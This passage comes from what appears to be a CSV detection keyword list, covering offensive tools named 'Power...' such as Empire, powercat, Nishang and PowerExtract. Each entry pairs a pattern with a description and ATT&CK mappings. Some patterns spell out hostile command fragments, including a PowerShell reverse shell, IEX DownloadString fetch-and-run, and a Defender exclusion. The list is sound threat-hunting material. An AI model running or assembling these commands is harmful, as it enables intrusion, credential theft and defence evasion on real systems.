from Service Account to 
System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*PowerBreach.ps1*",".{0,1000}PowerBreach\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" 
"*PowerBruteLogon.*",".{0,1000}PowerBruteLogon\..{0,1000}","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","115","21","2023-11-09T10:38:29Z","2021-12-01T09:40:22Z" "*powercat -c *",".{0,1000}powercat\s\-c\s.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","10","10","2034","462","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z" "*powercat -c * -p *",".{0,1000}powercat\s\-c\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*powercat -l *",".{0,1000}powercat\s\-l\s.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","10","10","2034","462","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z" "*powercat -l -p 4444*",".{0,1000}powercat\s\-l\s\-p\s4444.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" 
"*Powercat.ps1*",".{0,1000}Powercat\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*powerdump.ps1*",".{0,1000}powerdump\.ps1.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","373","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*powerdump.ps1*",".{0,1000}powerdump\.ps1.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*powerdump.rb*",".{0,1000}powerdump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*PowerExtract-main.zip*",".{0,1000}PowerExtract\-main\.zip.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. 
It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","2","106","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" "*PowerForensics*",".{0,1000}PowerForensics.{0,1000}","offensive_tool_keyword","PowerForensics","The purpose of PowerForensics is to provide an all inclusive framework for hard drive forensic analysis. PowerForensics currently supports NTFS and FAT file systems. and work has begun on Extended File System and HFS+ support.","T1003 - T1039 - T1046 - T1057","TA0005 - TA0007 - TA0010","N/A","N/A","Information Gathering","https://github.com/Invoke-IR/PowerForensics","1","1","N/A","N/A","10","1357","276","2023-11-16T10:31:37Z","2015-03-07T17:12:19Z" "*powerglot.py*",".{0,1000}powerglot\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*powerkatz.dll*",".{0,1000}powerkatz\.dll.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*powerkatz_x64.dll*",".{0,1000}powerkatz_x64\.dll.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*powerkatz_x86.dll*",".{0,1000}powerkatz_x86\.dll.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*PowerLessShell*",".{0,1000}PowerLessShell.{0,1000}","offensive_tool_keyword","PowerLessShell","PowerLessShell relies on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1445","249","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z" "*PowerLessShell.py*",".{0,1000}PowerLessShell\.py.{0,1000}","offensive_tool_keyword","PowerLessShell","PowerLessShell relies on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe.
You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1445","249","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z" "*powermad.ps1*",".{0,1000}powermad\.ps1.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1123","168","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" "*Powermad.psd1*",".{0,1000}Powermad\.psd1.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1123","168","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" "*Powermad.psm1*",".{0,1000}Powermad\.psm1.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1123","168","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" "*Powermad-master*",".{0,1000}Powermad\-master.{0,1000}","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","1","N/A","N/A","10","1123","168","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" "*PowerMemory*",".{0,1000}PowerMemory.{0,1000}","offensive_tool_keyword","PowerMemory","Exploit the credentials present in files and memory","T1003 - 
T1555 - T1213 - T1558","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/giMini/PowerMemory","1","0","N/A","N/A","9","835","221","2023-05-25T17:58:53Z","2015-08-29T17:09:23Z" "*PowerOPS*",".{0,1000}PowerOPS.{0,1000}","offensive_tool_keyword","PowerOPS","PowerOPS is an application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a powershell runspace environment (.NET). It intends to include multiple offensive PowerShell modules to make the process of Post Exploitation easier.","T1059 - T1027 - T1053 - T1129 - T1086","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/fdiskyou/PowerOPS","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powerpick -Command *",".{0,1000}powerpick\s\-Command\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*powerpick.py*",".{0,1000}powerpick\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*PowerPick.x64.dll*",".{0,1000}PowerPick\.x64\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 
- T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Powerpreter.psm1*",".{0,1000}Powerpreter\.psm1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Powerpreter.psm1*",".{0,1000}Powerpreter\.psm1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*powerpreter.psm1*",".{0,1000}powerpreter\.psm1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*powerpwn.powerdump*",".{0,1000}powerpwn\.powerdump.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","0","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*powerpwn_tests*",".{0,1000}powerpwn_tests.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","0","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*power-pwn-main*",".{0,1000}power\-pwn\-main.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","5","421","37","2024-04-18T20:34:47Z","2022-06-14T11:40:21Z" "*PowerSCCM.ps1*",".{0,1000}PowerSCCM\.ps1.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation 
tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","327","109","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" "*PowerSCCM.psd1*",".{0,1000}PowerSCCM\.psd1.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","327","109","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" "*PowerSCCM.psm1*",".{0,1000}PowerSCCM\.psm1.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","327","109","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" "*PowerSCCM-master*",".{0,1000}PowerSCCM\-master.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","8","4","327","109","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" "*powerseb/PowerExtract*",".{0,1000}powerseb\/PowerExtract.{0,1000}","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. 
It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","1","N/A","N/A","2","106","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" "*PowerSharpBinaries*",".{0,1000}PowerSharpBinaries.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*PowerSharpPack.ps1*",".{0,1000}PowerSharpPack\.ps1.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*PowerSharpPack-master*",".{0,1000}PowerSharpPack\-master.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation
tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*PowerShdll*",".{0,1000}PowerShdll.{0,1000}","offensive_tool_keyword","PowerShdll","Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.","T1059 - T1218 - T1216 - T1053 - T1118","TA0002 - TA0008 - TA0003","N/A","N/A","Defense Evasion","https://github.com/p3nt4/PowerShdll","1","1","N/A","N/A","10","1711","251","2021-03-17T02:02:23Z","2016-07-15T00:08:32Z" "*powershell *C:\Users\Public\*.exe* forfiles.exe /p *\system32 *.exe**",".{0,1000}powershell\s.{0,1000}C\:\\Users\\Public\\.{0,1000}\.exe.{0,1000}\sforfiles\.exe\s\/p\s.{0,1000}\\system32\s.{0,1000}\.exe.{0,1000}.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*powershell *Get-EventLog -LogName security -Newest 500 | where {$_.EventID -eq 4624} | format-list -property * | findstr*",".{0,1000}powershell\s.{0,1000}Get\-EventLog\s\-LogName\ssecurity\s\-Newest\s500\s\|\swhere\s\{\$_\.EventID\s\-eq\s4624\}\s\|\sformat\-list\s\-property\s.{0,1000}\s\|\sfindstr.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - 
T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell -c *New-Object System.Net.Sockets.TCPClient(""*$sendback = (iex *$data* 2>&1 | Out-String*",".{0,1000}powershell\s\-c\s.{0,1000}New\-Object\sSystem\.Net\.Sockets\.TCPClient\(\"".{0,1000}\$sendback\s\=\s\(iex\s.{0,1000}\$data.{0,1000}\s2\>\&1\s\|\sOut\-String.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","3","10","27","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z" "*powershell -enc dwBoAG8AYQBtAGkA*",".{0,1000}powershell\s\-enc\sdwBoAG8AYQBtAGkA.{0,1000}","offensive_tool_keyword","Conti Ranwomware","Conti Ransomware Proxyshell PowerShell command #1","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0010 - TA0011 - TA0009 - TA0007 - TA0008 - TA0001","Conti ransomware - TrickBot","N/A","Exploitation tools","https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell IEX (New-Object Net.WebClient).DownloadString(*) Get-NetComputer -FullData *",".{0,1000}powershell\sIEX\s\(New\-Object\sNet\.WebClient\)\.DownloadString\(.{0,1000}\)\s\sGet\-NetComputer\s\-FullData\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007
- T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell IEX (New-Object Net.WebClient).DownloadString*.ps1*Get-NetComputer -FullData*",".{0,1000}powershell\sIEX\s\(New\-Object\sNet\.WebClient\)\.DownloadString.{0,1000}\.ps1.{0,1000}Get\-NetComputer\s\-FullData.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation 
tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powershell Invoke-WebRequest ""http://0.0.0.0:8001/test.exe*",".{0,1000}powershell\sInvoke\-WebRequest\s\""http\:\/\/0\.0\.0\.0\:8001\/test\.exe.{0,1000}","offensive_tool_keyword","POC","Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604)","T1190 - T1059 - T1071 - T1105 - T1041","TA0001 - TA0002 - TA0009 - TA0011 - TA0010","N/A","N/A","Exploitation tools","https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ","1","1","N/A","9","1","91","31","2024-01-20T16:59:23Z","2023-11-03T22:06:09Z" "*powershell Invoke-WebRequest http*.bat *",".{0,1000}powershell\sInvoke\-WebRequest\shttp.{0,1000}\.bat\s.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","7","10","N/A","N/A","N/A","N/A" "*Powershell LDAPWordlistHarvester*",".{0,1000}Powershell\sLDAPWordlistHarvester.{0,1000}","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","0","N/A","5","3","288","22","2024-03-14T17:52:34Z","2023-09-22T10:10:10Z" "*powershell.exe -command ""Add-MpPreference -ExclusionExtension "".exe""*",".{0,1000}powershell\.exe\s\-command\s\""Add\-MpPreference\s\-ExclusionExtension\s\""\.exe\"".{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*powershell.exe -command *Enable-PSRemoting -Force* -ComputerName *",".{0,1000}powershell\.exe\s\-command\s.{0,1000}Enable\-PSRemoting\s\-Force.{0,1000}\s\-ComputerName\s.{0,1000}","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool 